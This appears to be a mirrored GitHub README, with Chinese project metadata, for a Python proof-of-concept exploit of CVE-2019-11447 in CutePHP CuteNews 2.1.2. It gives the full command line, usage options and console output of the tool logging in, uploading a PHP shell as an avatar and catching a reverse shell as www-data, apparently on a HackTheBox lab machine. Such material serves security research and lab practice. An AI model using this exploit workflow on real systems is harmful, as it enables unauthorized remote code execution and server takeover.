项目作者: thewhiteh4t

项目描述 :
CutePHP Cute News 2.1.2 RCE PoC
高级语言: Python
项目地址: git://github.com/thewhiteh4t/cve-2019-11447.git
创建时间: 2021-03-18T09:24:29Z
项目社区:https://github.com/thewhiteh4t/cve-2019-11447

开源协议:

下载


CVE-2019-11447

CutePHP Cute News 2.1.2 RCE PoC

Target : 2.1.2

This PoC script is based on a simple implementation of the original exploit by BobbySox. The original exploit is an MSF module by Akuss.

This script needs the target ip address or domain along with credentials and it will automatically login, upload payload, trigger it and catch the reverse shell.

  1. python cve-2019-11447.py -t 10.10.10.206 -u twh -p p4ssw0rd -lh 10.10.16.2 -lp 4444 -f shell
  2. --------------------------------------
  3. --- CVE-2019-11447 -------------------
  4. --- CuteNews Arbitrary File Upload ---
  5. --- CutePHP CuteNews 2.1.2 -----------
  6. --------------------------------------
  7. [>] Found By : Akkus [ https://twitter.com/ehakkus ]
  8. [>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
  9. [>] Target : http://10.10.10.206/CuteNews/index.php
  10. [>] Username : twh
  11. [>] Password : p4ssw0rd
  12. [!] Logging in...
  13. [+] Logged In!
  14. [+] Loading Profile...
  15. [+] Searching Signatures...
  16. [!] Uploading Payload...
  17. [+] Loading Profile...
  18. [+] Searching Avatar URL...
  19. [*] URL : http://passage.htb/CuteNews/uploads/avatar_twh_shell.php
  20. [!] Payload will trigger in 5 seconds...
  21. [!] Starting Listner...
  22. [+] Trying to bind to :: on port 4444: Done
  23. [+] Waiting for connections on :::4444: Got connection from ::ffff:10.10.10.206 on port 35196
  24. [*] Switching to interactive mode
  25. bash: cannot set terminal process group (1656): Inappropriate ioctl for device
  26. bash: no job control in this shell
  27. www-data@passage:/var/www/html/CuteNews/uploads$ $ id
  28. id
  29. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  30. www-data@passage:/var/www/html/CuteNews/uploads$ $

Dependencies

  1. pip3 install requests bs4 pwntools

Usage

  1. python cve-2019-11447.py -h
  2. usage: cve-2019-11447.py [-h] [-t TARGET] [-u UNAME] [-p PASSW] [-lh LHOST] [-lp LPORT] [-f FILE]
  3. optional arguments:
  4. -h, --help show this help message and exit
  5. -t TARGET, --target TARGET Target IP address or domain
  6. -u UNAME, --uname UNAME Username
  7. -p PASSW, --passw PASSW Password
  8. -lh LHOST, --lhost LHOST Listener IP address
  9. -lp LPORT, --lport LPORT Listener Port
  10. -f FILE, --file FILE Filename for payload WITHOUT extension

Credits